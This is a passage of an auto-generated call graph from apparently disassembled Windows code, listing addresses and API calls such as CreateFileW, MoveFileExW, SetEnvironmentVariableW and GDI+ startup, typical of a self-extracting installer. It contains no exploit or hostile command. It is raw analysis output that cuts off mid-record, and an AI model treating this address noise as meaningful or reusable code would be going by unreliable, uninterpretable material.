CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24346->24394 24347->24064 24349 e98186 24348->24349 24350 e98232 24349->24350 24401 e9be5e 19 API calls __InternalCxxFrameHandler 24349->24401 24400 ea1fac CharUpperW 24350->24400 24353 e9823b 24353->24067 24355 e97c22 24354->24355 24356 e97c5a 24355->24356 24402 e96e7a 74 API calls 24355->24402 24356->24078 24358 e97c52 24403 e9138b 74 API calls 24358->24403 24360->24130 24362 e99db3 24361->24362 24364 e99dc2 24361->24364 24363 e99db9 FlushFileBuffers 24362->24363 24362->24364 24363->24364 24365 e99e3f SetFileTime 24364->24365 24365->24135 24366->24057 24367->24068 24368->24068 24369->24078 24370->24078 24371->24074 24372->24086 24373->24097 24374->24086 24376 e998c5 GetFileType 24375->24376 24377 e98b5a 24375->24377 24376->24377 24377->24084 24378 e92021 74 API calls 24377->24378 24378->24099 24379->24084 24380->24101 24381->24126 24382->24126 24383->24126 24384->24126 24385->24126 24386->24132 24387->24138 24388->24128 24395 e95b48 24389->24395 24391 e95c6c 24391->24346 24393 e95b48 2 API calls 24393->24391 24394->24346 24397 e95b52 24395->24397 24396 e95c3a 24396->24391 24396->24393 24397->24396 24399 e9b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24397->24399 24399->24397 24400->24353 24401->24350 24402->24358 24403->24356 24405 e9cef2 24404->24405 24410 e9a99e 24405->24410 24407 e9cf24 24408 e9a99e 86 API calls 24407->24408 24409 e9cf2f 24408->24409 24411 e9a9c1 24410->24411 24414 e9a9d5 24410->24414 24415 ea0eed 86 API calls 24411->24415 24413 e9a9c8 24413->24414 24414->24407 24415->24413 24416->24148 24418 e9a6a8 24417->24418 24419 e9a6c1 FindFirstFileW 24418->24419 24420 e9a727 FindNextFileW 24418->24420 24422 e9a6d0 24419->24422 24427 e9a709 24419->24427 24421 e9a732 GetLastError 24420->24421 24420->24427 24421->24427 24423 e9bb03 GetCurrentDirectoryW 24422->24423 24424 e9a6e0 24423->24424 24425 e9a6fe GetLastError 24424->24425 24426 e9a6e4 FindFirstFileW 24424->24426 24425->24427 24426->24425 24426->24427 24427->24001 24437 eaa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24428->24437 24430 eaa5cd 24431 eaa5d9 24430->24431 24438 eaa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24430->24438 24431->23645 24431->23646 24433->23649 24434->23655 24435->23655 24436->23658 24437->24430 24438->24431 24439->23666 24441 e99f42 78 API calls 24440->24441 24442 e91fe8 24441->24442 24443 e91a04 101 API calls 24442->24443 24446 e92005 24442->24446 24444 e91ff5 24443->24444 24444->24446 24447 e9138b 74 API calls 24444->24447 24446->23674 24446->23675 24447->24446 24449 eab5bc GetDlgItem 24448->24449 24450 eab583 GetMessageW 24448->24450 24449->23685 24449->23686 24451 eab5a8 TranslateMessage DispatchMessageW 24450->24451 24452 eab599 IsDialogMessageW 24450->24452 24451->24449 24452->24449 24452->24451 25264 ea94e0 GetClientRect 25301 ea21e0 26 API calls std::bad_exception::bad_exception 25326 eaf2e0 46 API calls __RTC_Initialize 25327 ebbee0 GetCommandLineA GetCommandLineW 24453 eaeae7 24454 eaeaf1 24453->24454 24455 eae85d ___delayLoadHelper2@8 14 API calls 24454->24455 24456 eaeafe 24455->24456 25265 eaf4e7 29 API calls _abort 25266 eb2cfb 38 API calls 4 library calls 25302 e995f0 80 API calls 25328 e95ef0 82 API calls 24473 eb98f0 24481 ebadaf 24473->24481 24477 eb9919 24478 eb990c 24478->24477 24489 eb9920 11 API calls 24478->24489 24480 eb9904 24490 ebac98 24481->24490 24484 ebadee TlsAlloc 24485 ebaddf 24484->24485 24486 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24485->24486 24487 eb98fa 24486->24487 24487->24480 24488 eb9869 20 API calls 2 library calls 24487->24488 24488->24478 24489->24480 24491 ebacc8 24490->24491 24494 ebacc4 24490->24494 24491->24484 24491->24485 24492 ebace8 24492->24491 24495 ebacf4 GetProcAddress 24492->24495 24494->24491 24494->24492 24497 ebad34 24494->24497 24496 ebad04 _abort 24495->24496 24496->24491 24498 ebad4a 24497->24498 24499 ebad55 LoadLibraryExW 24497->24499 24498->24494 24500 ebad72 GetLastError 24499->24500 24501 ebad8a 24499->24501 24500->24501 24502 ebad7d LoadLibraryExW 24500->24502 24501->24498 24503 ebada1 FreeLibrary 24501->24503 24502->24501 24503->24498 24504 ebabf0 24505 ebabfb 24504->24505 24507 ebac24 24505->24507 24509 ebac20 24505->24509 24510 ebaf0a 24505->24510 24517 ebac50 DeleteCriticalSection 24507->24517 24511 ebac98 _abort 5 API calls 24510->24511 24512 ebaf31 24511->24512 24513 ebaf3a 24512->24513 24514 ebaf4f InitializeCriticalSectionAndSpinCount 24512->24514 24515 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24513->24515 24514->24513 24516 ebaf66 24515->24516 24516->24505 24517->24509 25267 eb88f0 7 API calls ___scrt_uninitialize_crt 25304 eafd4f 9 API calls 2 library calls 25329 ea62ca 123 API calls __InternalCxxFrameHandler 24530 eadec2 24531 eadecf 24530->24531 24532 e9e617 53 API calls 24531->24532 24533 eadedc 24532->24533 24534 e94092 _swprintf 51 API calls 24533->24534 24535 eadef1 SetDlgItemTextW 24534->24535 24536 eab568 5 API calls 24535->24536 24537 eadf0e 24536->24537 25305 eab5c0 100 API calls 25344 ea77c0 118 API calls 25345 eaffc0 RaiseException _com_raise_error _com_error::_com_error 25331 eb0ada 51 API calls 2 library calls 25270 eaf4d3 20 API calls 24605 eae1d1 14 API calls ___delayLoadHelper2@8 25346 eba3d0 21 API calls 2 library calls 24606 e910d5 24611 e95abd 24606->24611 24612 e95ac7 __EH_prolog 24611->24612 24613 e9b505 84 API calls 24612->24613 24614 e95ad3 24613->24614 24618 e95cac GetCurrentProcess GetProcessAffinityMask 24614->24618 25347 ec2bd0 VariantClear 24619 eae2d7 24620 eae1db 24619->24620 24621 eae85d ___delayLoadHelper2@8 14 API calls 24620->24621 24621->24620 25348 e96faa 111 API calls 3 library calls 25349 eaf3a0 27 API calls 25273 eba4a0 71 API calls _free 25274 eadca1 DialogBoxParamW 25275 ec08a0 IsProcessorFeaturePresent 25308 eaeda7 48 API calls _unexpected 25350 ea1bbd GetCPInfo IsDBCSLeadByte 24636 eaf3b2 24637 eaf3be __FrameHandler3::FrameUnwindToState 24636->24637 24668 eaeed7 24637->24668 24639 eaf518 24741 eaf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24639->24741 24641 eaf51f 24734 eb7f58 24641->24734 24642 eaf3c5 24642->24639 24643 eaf3ef 24642->24643 24656 eaf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24643->24656 24679 eb8aed 24643->24679 24650 eaf40e 24652 eaf48f 24687 eaf953 GetStartupInfoW _abort 24652->24687 24654 eaf495 24688 eb8a3e 51 API calls 24654->24688 24656->24652 24737 eb7af4 38 API calls _abort 24656->24737 24657 eaf49d 24689 eadf1e 24657->24689 24662 eaf4b1 24662->24641 24663 eaf4b5 24662->24663 24664 eaf4be 24663->24664 24739 eb7efb 28 API calls _abort 24663->24739 24740 eaf048 12 API calls ___scrt_uninitialize_crt 24664->24740 24667 eaf4c6 24667->24650 24669 eaeee0 24668->24669 24743 eaf654 IsProcessorFeaturePresent 24669->24743 24671 eaeeec 24744 eb2a5e 24671->24744 24673 eaeef1 24674 eaeef5 24673->24674 24752 eb8977 24673->24752 24674->24642 24677 eaef0c 24677->24642 24680 eb8b04 24679->24680 24681 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24680->24681 24682 eaf408 24681->24682 24682->24650 24683 eb8a91 24682->24683 24684 eb8ac0 24683->24684 24685 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24684->24685 24686 eb8ae9 24685->24686 24686->24656 24687->24654 24688->24657 24845 ea0863 24689->24845 24693 eadf3d 24894 eaac16 24693->24894 24695 eadf46 _abort 24696 eadf59 GetCommandLineW 24695->24696 24697 eadf68 24696->24697 24698 eadfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24696->24698 24898 eac5c4 24697->24898 24699 e94092 _swprintf 51 API calls 24698->24699 24701 eae04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24699->24701 24909 eab6dd LoadBitmapW 24701->24909 24704 eadfe0 24903 eadbde 24704->24903 24705 eadf76 OpenFileMappingW 24708 eadf8f MapViewOfFile 24705->24708 24709 eadfd6 CloseHandle 24705->24709 24711 eadfcd UnmapViewOfFile 24708->24711 24712 eadfa0 __InternalCxxFrameHandler 24708->24712 24709->24698 24711->24709 24715 eadbde 2 API calls 24712->24715 24717 eadfbc 24715->24717 24717->24711 24718 ea90b7 8 API calls 24719 eae0aa DialogBoxParamW 24718->24719 24720 eae0e4 24719->24720 24721 eae0fd 24720->24721 24722 eae0f6 Sleep 24720->24722 24725 eae10b 24721->24725 24939 eaae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24721->24939 24722->24721 24724 eae12a DeleteObject 24726 eae13f DeleteObject 24724->24726 24727 eae146 24724->24727 24725->24724 24726->24727 24728 eae189 24727->24728 24729 eae177 24727->24729 24936 eaac7c 24728->24936 24940 eadc3b 6 API calls 24729->24940 24732 eae17d CloseHandle 24732->24728 24733 eae1c3 24738 eaf993 GetModuleHandleW 24733->24738 25070 eb7cd5 24734->25070 24737->24652 24738->24662 24739->24664 24740->24667 24741->24641 24743->24671 24756 eb3b07 24744->24756 24747 eb2a67 24747->24673 24749 eb2a6f 24750 eb2a7a 24749->24750 24770 eb3b43 DeleteCriticalSection 24749->24770 24750->24673 24799 ebc05a 24752->24799 24755 eb2a7d 7 API calls 2 library calls 24755->24674 24757 eb3b10 24756->24757 24759 eb3b39 24757->24759 24761 eb2a63 24757->24761 24771 eb3d46 24757->24771 24776 eb3b43 DeleteCriticalSection 24759->24776 24761->24747 24762 eb2b8c 24761->24762 24792 eb3c57 24762->24792 24766 eb2bbc 24766->24749 24767 eb2baf 24767->24766 24798 eb2bbf 6 API calls ___vcrt_FlsFree 24767->24798 24769 eb2ba1 24769->24749 24770->24747 24777 eb3c0d 24771->24777 24774 eb3d7e InitializeCriticalSectionAndSpinCount 24775 eb3d69 24774->24775 24775->24757 24776->24761 24778 eb3c4f 24777->24778 24779 eb3c26 24777->24779 24778->24774 24778->24775 24779->24778 24784 eb3b72 24779->24784 24782 eb3c3b GetProcAddress 24782->24778 24783 eb3c49 24782->24783 24783->24778 24785 eb3b7e ___vcrt_InitializeCriticalSectionEx 24784->24785 24786 eb3bf3 24785->24786 24787 eb3b95 LoadLibraryExW 24785->24787 24791 eb3bd5 LoadLibraryExW 24785->24791 24786->24778 24786->24782 24788 eb3bfa 24787->24788 24789 eb3bb3 GetLastError 24787->24789 24788->24786 24790 eb3c02 FreeLibrary 24788->24790 24789->24785 24790->24786 24791->24785 24791->24788 24793 eb3c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 24792->24793 24794 eb3c71 24793->24794 24795 eb3c8a TlsAlloc 24794->24795 24796 eb2b96 24794->24796 24796->24769 24797 eb3d08 6 API calls ___vcrt_InitializeCriticalSectionEx 24796->24797 24797->24767 24798->24769 24802 ebc077 24799->24802 24803 ebc073 24799->24803 24800 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24801 eaeefe 24800->24801 24801->24677 24801->24755 24802->24803 24805 eba6a0 24802->24805 24803->24800 24806 eba6ac __FrameHandler3::FrameUnwindToState 24805->24806 24817 ebac31 EnterCriticalSection 24806->24817 24808 eba6b3 24818 ebc528 24808->24818 24810 eba6c2 24811 eba6d1 24810->24811 24831 eba529 29 API calls 24810->24831 24833 eba6ed LeaveCriticalSection _abort 24811->24833 24814 eba6cc 24832 eba5df GetStdHandle GetFileType 24814->24832 24815 eba6e2 _abort 24815->24802 24817->24808 24819 ebc534 __FrameHandler3::FrameUnwindToState 24818->24819 24820 ebc558 24819->24820 24821 ebc541 24819->24821 24834 ebac31 EnterCriticalSection 24820->24834 24842 eb91a8 20 API calls __dosmaperr 24821->24842 24824 ebc546 24843 eb9087 26 API calls ___std_exception_copy 24824->24843 24826 ebc590 24844 ebc5b7 LeaveCriticalSection _abort 24826->24844 24827 ebc550 _abort 24827->24810 24830 ebc564 24830->24826 24835 ebc479 24830->24835 24831->24814 24832->24811 24833->24815 24834->24830 24836 ebb136 _abort 20 API calls 24835->24836 24838 ebc48b 24836->24838 24837 ebc498 24839 eb8dcc _free 20 API calls 24837->24839 24838->24837 24840 ebaf0a 11 API calls 24838->24840 24841 ebc4ea 24839->24841 24840->24838 24841->24830 24842->24824 24843->24827 24844->24827 24846 eaec50 24845->24846 24847 ea086d GetModuleHandleW 24846->24847 24848 ea0888 GetProcAddress 24847->24848 24849 ea08e7 24847->24849 24851 ea08b9 GetProcAddress 24848->24851 24852 ea08a1 24848->24852 24850 ea0c14 GetModuleFileNameW 24849->24850 24950 eb75fb 42 API calls 2 library calls 24849->24950 24861 ea0c32 24850->24861 24854 ea08cb 24851->24854 24852->24851 24854->24849 24855 ea0b54 24855->24850 24856 ea0b5f GetModuleFileNameW CreateFileW 24855->24856 24857 ea0c08 CloseHandle 24856->24857 24858 ea0b8f SetFilePointer 24856->24858 24857->24850 24858->24857 24859 ea0b9d ReadFile 24858->24859 24859->24857 24863 ea0bbb 24859->24863 24864 ea0c94 GetFileAttributesW 24861->24864 24866 ea0c5d CompareStringW 24861->24866 24867 ea0cac 24861->24867 24941 e9b146 24861->24941 24944 ea081b 24861->24944 24863->24857 24865 ea081b 2 API calls 24863->24865 24864->24861 24864->24867 24865->24863 24866->24861 24868 ea0cb7 24867->24868 24871 ea0cec 24867->24871 24870 ea0cd0 GetFileAttributesW 24868->24870 24872 ea0ce8 24868->24872 24869 ea0dfb 24893 eaa64d GetCurrentDirectoryW 24869->24893 24870->24868 24870->24872 24871->24869 24873 e9b146 GetVersionExW 24871->24873 24872->24871 24874 ea0d06 24873->24874 24875 ea0d0d 24874->24875 24876 ea0d73 24874->24876 24877 ea081b 2 API calls 24875->24877 24878 e94092 _swprintf 51 API calls 24876->24878 24879 ea0d17 24877->24879 24880 ea0d9b AllocConsole 24878->24880 24881 ea081b 2 API calls 24879->24881 24882 ea0da8 GetCurrentProcessId AttachConsole 24880->24882 24883 ea0df3 ExitProcess 24880->24883 24885 ea0d21 24881->24885 24951 eb3e13 24882->24951 24887 e9e617 53 API calls 24885->24887 24886 ea0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24886->24883 24888 ea0d3c 24887->24888 24889 e94092 _swprintf 51 API calls 24888->24889 24890 ea0d4f 24889->24890 24891 e9e617 53 API calls 24890->24891 24892 ea0d5e 24891->24892 24892->24883 24893->24693 24895 ea081b 2 API calls 24894->24895 24896 eaac2a OleInitialize 24895->24896 24897 eaac4d GdiplusStartup SHGetMalloc 24896->24897 24897->24695 24900 eac5ce 24898->24900 24899 eac6e4 24899->24704 24899->24705 24900->24899 24901 ea1fac CharUpperW 24900->24901 24953 e9f3fa 82 API calls 2 library calls 24900->24953 24901->24900 24904 eaec50 24903->24904 24905 eadbeb SetEnvironmentVariableW 24904->24905 24907 eadc0e 24905->24907 24906 eadc36 24906->24698 24907->24906 24908 eadc2a SetEnvironmentVariableW 24907->24908 24908->24906 24910 eab70b GetObjectW 24909->24910 24911 eab6fe 24909->24911 24913 eab71a 24910->24913 24954 eaa6c2 FindResourceW 24911->24954 24915 eaa5c6 4 API calls 24913->24915 24917 eab72d 24915->24917 24916 eab770 24928 e9da42 24916->24928 24917->24916 24918 eab74c 24917->24918 24920 eaa6c2 12 API calls 24917->24920 24968 eaa605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24918->24968 24922 eab73d 24920->24922 24921 eab754 24969 eaa5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24921->24969 24922->24918 24924 eab743 DeleteObject 24922->24924 24924->24918 24925 eab75d 24970 eaa80c 8 API calls 24925->24970 24927 eab764 DeleteObject 24927->24916 24979 e9da67 24928->24979 24933 ea90b7 24934 eaeb38 8 API calls 24933->24934 24935 ea90d6 24934->24935 24935->24718 24937 eaacab GdiplusShutdown CoUninitialize 24936->24937 24937->24733 24939->24725 24940->24732 24942 e9b15a GetVersionExW 24941->24942 24943 e9b196 24941->24943 24942->24943 24943->24861 24945 eaec50 24944->24945 24946 ea0828 GetSystemDirectoryW 24945->24946 24947 ea085e 24946->24947 24948 ea0840 24946->24948 24947->24861 24949 ea0851 LoadLibraryW 24948->24949 24949->24947 24950->24855 24952 eb3e1b 24951->24952 24952->24886 24952->24952 24953->24900 24955 eaa7d3 24954->24955 24956 eaa6e5 SizeofResource 24954->24956 24955->24910 24955->24913 24956->24955 24957 eaa6fc LoadResource 24956->24957 24957->24955 24958 eaa711 LockResource 24957->24958 24958->24955 24959 eaa722 GlobalAlloc 24958->24959 24959->24955 24960 eaa73d GlobalLock 24959->24960 24961 eaa7cc GlobalFree 24960->24961 24962 eaa74c __InternalCxxFrameHandler 24960->24962 24961->24955 24963 eaa7c5 GlobalUnlock 24962->24963 24971 eaa626 GdipAlloc 24962->24971 24963->24961 24966 eaa79a GdipCreateHBITMAPFromBitmap 24967 eaa7b0 24966->24967 24967->24963 24968->24921 24969->24925 24970->24927 24972 eaa638 24971->24972 24973 eaa645 24971->24973 24975 eaa3b9 24972->24975 24973->24963 24973->24966 24973->24967 24976 eaa3da GdipCreateBitmapFromStreamICM 24975->24976 24977 eaa3e1 GdipCreateBitmapFromStream 24975->24977 24978 eaa3e6 24976->24978 24977->24978 24978->24973 24980 e9da75 _wcschr __EH_prolog 24979->24980 24981 e9daa4 GetModuleFileNameW 24980->24981 24982 e9dad5 24980->24982 24983 e9dabe 24981->24983 25025 e998e0 24982->25025 24983->24982 24985 e9db31 25036 eb6310 24985->25036 24986 e9959a 80 API calls 24988 e9da4e 24986->24988 24987 e9e261 78 API calls 24990 e9db05 24987->24990 25023 e9e29e GetModuleHandleW FindResourceW 24988->25023 24990->24985 24990->24987 25003 e9dd4a 24990->25003 24991 e9db44 24992 eb6310 26 API calls 24991->24992 25000 e9db56 ___vcrt_InitializeCriticalSectionEx 24992->25000 24993 e9dc85 24993->25003 25056 e99d70 81 API calls 24993->25056 24995 e99e80 79 API calls 24995->25000 24997 e9dc9f ___std_exception_copy 24998 e99bd0 82 API calls 24997->24998 24997->25003 25001 e9dcc8 ___std_exception_copy 24998->25001 25000->24993 25000->24995 25000->25003 25050 e99bd0 25000->25050 25055 e99d70 81 API calls 25000->25055 25001->25003 25020 e9dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 25001->25020 25057 ea1b84 MultiByteToWideChar 25001->25057 25003->24986 25004 e9e159 25008 e9e1de 25004->25008 25063 eb8cce 26 API calls ___std_exception_copy 25004->25063 25006 e9e16e 25064 eb7625 26 API calls ___std_exception_copy 25006->25064 25009 e9e214 25008->25009 25013 e9e261 78 API calls 25008->25013 25014 eb6310 26 API calls 25009->25014 25011 e9e1c6 25065 e9e27c 78 API calls 25011->25065 25013->25008 25015 e9e22d 25014->25015 25016 eb6310 26 API calls 25015->25016 25016->25003 25018 ea1da7 WideCharToMultiByte 25018->25020 25020->25003 25020->25004 25020->25018 25058 e9e5b1 50 API calls __vsnprintf 25020->25058 25059 eb6159 26 API calls 3 library calls 25020->25059 25060 eb8cce 26 API calls ___std_exception_copy 25020->25060 25061 eb7625 26 API calls ___std_exception_copy 25020->25061 25062 e9e27c 78 API calls 25020->25062 25024 e9da55 25023->25024 25024->24933 25026 e998ea 25025->25026 25027 e9994b CreateFileW 25026->25027 25028 e9996c GetLastError 25027->25028 25032 e999bb 25027->25032 25029 e9bb03 GetCurrentDirectoryW 25028->25029 25030 e9998c 25029->25030 25031 e99990 CreateFileW GetLastError 25030->25031 25030->25032 25031->25032 25034 e999b5 25031->25034 25033 e999ff 25032->25033 25035 e999e5 SetFileTime 25032->25035 25033->24990 25034->25032 25035->25033 25037 eb6349 25036->25037 25038 eb634d 25037->25038 25049 eb6375 25037->25049 25066 eb91a8 20 API calls __dosmaperr 25038->25066 25040 eb6352 25067 eb9087 26 API calls ___std_exception_copy 25040->25067 25041 eb6699 25043 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25041->25043 25045 eb66a6 25043->25045 25044 eb635d 25046 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25044->25046 25045->24991 25047 eb6369 25046->25047 25047->24991 25049->25041 25068 eb6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25049->25068 25051 e99bdc 25050->25051 25052 e99be3 25050->25052 25051->25000 25052->25051 25054 e99785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25052->25054 25069 e96d1a 77 API calls 25052->25069 25054->25052 25055->25000 25056->24997 25057->25020 25058->25020 25059->25020 25060->25020 25061->25020 25062->25020 25063->25006 25064->25011 25065->25008 25066->25040 25067->25044 25068->25049 25069->25052 25071 eb7ce1 _abort 25070->25071 25072 eb7cfa 25071->25072 25073 eb7ce8 25071->25073 25094 ebac31 EnterCriticalSection 25072->25094 25106 eb7e2f GetModuleHandleW 25073->25106 25076 eb7ced 25076->25072 25107 eb7e73 GetModuleHandleExW 25076->25107 25077 eb7d9f 25095 eb7ddf 25077->25095 25081 eb7d76 25086 eb7d8e 25081->25086 25090 eb8a91 _abort 5 API calls 25081->25090 25083 eb7d01 25083->25077 25083->25081 25115 eb87e0 20 API calls _abort 25083->25115 25084 eb7de8 25116 ec2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25084->25116 25085 eb7dbc 25098 eb7dee 25085->25098 25091 eb8a91 _abort 5 API calls 25086->25091 25090->25086 25091->25077 25094->25083 25117 ebac81 LeaveCriticalSection 25095->25117 25097 eb7db8 25097->25084 25097->25085 25118 ebb076 25098->25118 25101 eb7e1c 25104 eb7e73 _abort 8 API calls 25101->25104 25102 eb7dfc GetPEB 25102->25101 25103 eb7e0c GetCurrentProcess TerminateProcess 25102->25103 25103->25101 25105 eb7e24 ExitProcess 25104->25105 25106->25076 25108 eb7e9d GetProcAddress 25107->25108 25109 eb7ec0 25107->25109 25110 eb7eb2 25108->25110 25111 eb7ecf 25109->25111 25112 eb7ec6 FreeLibrary 25109->25112 25110->25109 25113 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25111->25113 25112->25111 25114 eb7cf9 25113->25114 25114->25072 25115->25081 25117->25097 25119 ebb09b 25118->25119 25123 ebb091 25118->25123 25120 ebac98 _abort 5 API calls 25119->25120 25120->25123 25121 eafbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25122 eb7df8 25121->25122 25122->25101 25122->25102 25123->25121 25309 eab1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 25277 eac793 97 API calls 4 library calls 25312 eab18d 78 API calls 25313 ea9580 CompareStringW ShowWindow SetWindowTextW GlobalAlloc WideCharToMultiByte 25333 eac793 102 API calls 5 library calls 25279 ebb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25281 eac793 107 API calls 5 library calls 23334 eae569 23335 eae517 23334->23335 23335->23334 23337 eae85d 23335->23337 23363 eae5bb 23337->23363 23339 eae86d 23340 eae8ca 23339->23340 23341 eae8ee 23339->23341 23342 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23340->23342 23345 eae966 LoadLibraryExA 23341->23345 23347 eae9c7 23341->23347 23348 eae9d9 23341->23348 23358 eaea95 23341->23358 23343 eae8d5 RaiseException 23342->23343 23344 eaeac3 23343->23344 23344->23335 23346 eae979 GetLastError 23345->23346 23345->23347 23351 eae98c 23346->23351 23352 eae9a2 23346->23352 23347->23348 23350 eae9d2 FreeLibrary 23347->23350 23349 eaea37 GetProcAddress 23348->23349 23348->23358 23354 eaea47 GetLastError 23349->23354 23349->23358 23350->23348 23351->23347 23351->23352 23353 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23352->23353 23355 eae9ad RaiseException 23353->23355 23356 eaea5a 23354->23356 23355->23344 23356->23358 23359 eae7fb DloadReleaseSectionWriteAccess 6 API calls 23356->23359 23372 eae7fb 23358->23372 23360 eaea7b RaiseException 23359->23360 23361 eae5bb ___delayLoadHelper2@8 6 API calls 23360->23361 23362 eaea92 23361->23362 23362->23358 23364 eae5ed 23363->23364 23365 eae5c7 23363->23365 23364->23339 23380 eae664 23365->23380 23367 eae5cc 23369 eae5e8 23367->23369 23383 eae78d 23367->23383 23388 eae5ee GetModuleHandleW GetProcAddress GetProcAddress 23369->23388 23371 eae836 23371->23339 23373 eae82f 23372->23373 23374 eae80d 23372->23374 23373->23344 23375 eae664 DloadReleaseSectionWriteAccess 3 API calls 23374->23375 23376 eae812 23375->23376 23377 eae82a 23376->23377 23378 eae78d DloadProtectSection 3 API calls 23376->23378 23391 eae831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23377->23391 23378->23377 23389 eae5ee GetModuleHandleW GetProcAddress GetProcAddress 23380->23389 23382 eae669 23382->23367 23385 eae7a2 DloadProtectSection 23383->23385 23384 eae7a8 23384->23369 23385->23384 23386 eae7dd VirtualProtect 23385->23386 23390 eae6a3 VirtualQuery GetSystemInfo 23385->23390 23386->23384 23388->23371 23389->23382 23390->23386 23391->23373 25334 eb8268 55 API calls _free 25353 eb7f6e 52 API calls 3 library calls 24458 e99f7a 24459 e99f88 24458->24459 24460 e99f8f 24458->24460 24461 e99f9c GetStdHandle 24460->24461 24468 e99fab 24460->24468 24461->24468 24462 e9a003 WriteFile 24462->24468 24463 e99fcf 24464 e99fd4 WriteFile 24463->24464 24463->24468 24464->24463 24464->24468 24466 e9a095 24470 e96e98 77 API calls 24466->24470 24468->24459 24468->24462 24468->24463 24468->24464 24468->24466 24469 e96baa 78 API calls 24468->24469 24469->24468 24470->24459 25283 eaa070 10 API calls 25335 eab270 99 API calls 25355 e91f72 128 API calls __EH_prolog 25285 e91075 84 API calls 24519 e99a74 24522 e99a7e 24519->24522 24520 e99b9d SetFilePointer 24521 e99bb6 GetLastError 24520->24521 24525 e99ab1 24520->24525 24521->24525 24522->24520 24523 e9981a 79 API calls 24522->24523 24524 e99b79 24522->24524 24522->24525 24523->24524 24524->24520 25286 eaa440 GdipCloneImage GdipAlloc 25336 eb3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25357 ec1f40 CloseHandle 24543 eacd58 24544 eace22 24543->24544 24550 eacd7b _wcschr 24543->24550 24555 eac793 _wcslen _wcsrchr 24544->24555 24571 ead78f 24544->24571 24545 eab314 ExpandEnvironmentStringsW 24545->24555 24547 ead40a 24549 ea1fbb CompareStringW 24549->24550 24550->24544 24550->24549 24551 eaca67 SetWindowTextW 24551->24555 24554 eb3e3e 22 API calls 24554->24555 24555->24545 24555->24547 24555->24551 24555->24554 24557 eac855 SetFileAttributesW 24555->24557 24562 eacc31 GetDlgItem SetWindowTextW SendMessageW 24555->24562 24566 eacc71 SendMessageW 24555->24566 24570 ea1fbb CompareStringW 24555->24570 24593 eaa64d GetCurrentDirectoryW 24555->24593 24595 e9a5d1 6 API calls 24555->24595 24596 e9a55a FindClose 24555->24596 24597 eab48e 76 API calls 2 library calls 24555->24597 24559 eac90f GetFileAttributesW 24557->24559 24569 eac86f _abort _wcslen 24557->24569 24559->24555 24561 eac921 DeleteFileW 24559->24561 24561->24555 24563 eac932 24561->24563 24562->24555 24564 e94092 _swprintf 51 API calls 24563->24564 24565 eac952 GetFileAttributesW 24564->24565 24565->24563 24567 eac967 MoveFileW 24565->24567 24566->24555 24567->24555 24568 eac97f MoveFileExW 24567->24568 24568->24555 24569->24555 24569->24559 24594 e9b991 51 API calls 3 library calls 24569->24594 24570->24555 24574 ead799 _abort _wcslen 24571->24574 24572 ead9e7 24572->24555 24573 ead9c0 24573->24572 24578 ead9de ShowWindow 24573->24578 24574->24572 24574->24573 24575 ead8a5 24574->24575 24598 ea1fbb CompareStringW 24574->24598 24577 e9a231 3 API calls 24575->24577 24579 ead8ba 24577->24579 24578->24572 24585 ead8d1 24579->24585 24599 e9b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24579->24599 24581 ead925 24600 eadc3b 6 API calls 24581->24600 24582 ead97b CloseHandle 24583 ead994 24582->24583 24584 ead989 24582->24584 24583->24573 24601 ea1fbb CompareStringW 24584->24601 24585->24572 24585->24581 24585->24582 24588 ead91b ShowWindow 24585->24588 24588->24581 24589 ead93d 24589->24582 24590 ead950 GetExitCodeProcess 24589->24590 24590->24582 24591 ead963 24590->24591 24591->24582 24593->24555 24594->24569 24595->24555 24596->24555 24597->24555 24598->24575 24599->24585 24600->24589 24601->24583 25288 eae455 14 API calls ___delayLoadHelper2@8 25318 ebb4ae 27 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25290 ebf421 21 API calls __vswprintf_c_l 25338 eac220 93 API calls _swprintf 25292 e91025 29 API calls 25319 eaf530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25360 eaff30 LocalFree 25127 ebbb30 25128 ebbb42 25127->25128 25129 ebbb39 25127->25129 25131 ebba27 25129->25131 25132 eb97e5 _abort 38 API calls 25131->25132 25133 ebba34 25132->25133 25151 ebbb4e 25133->25151 25135 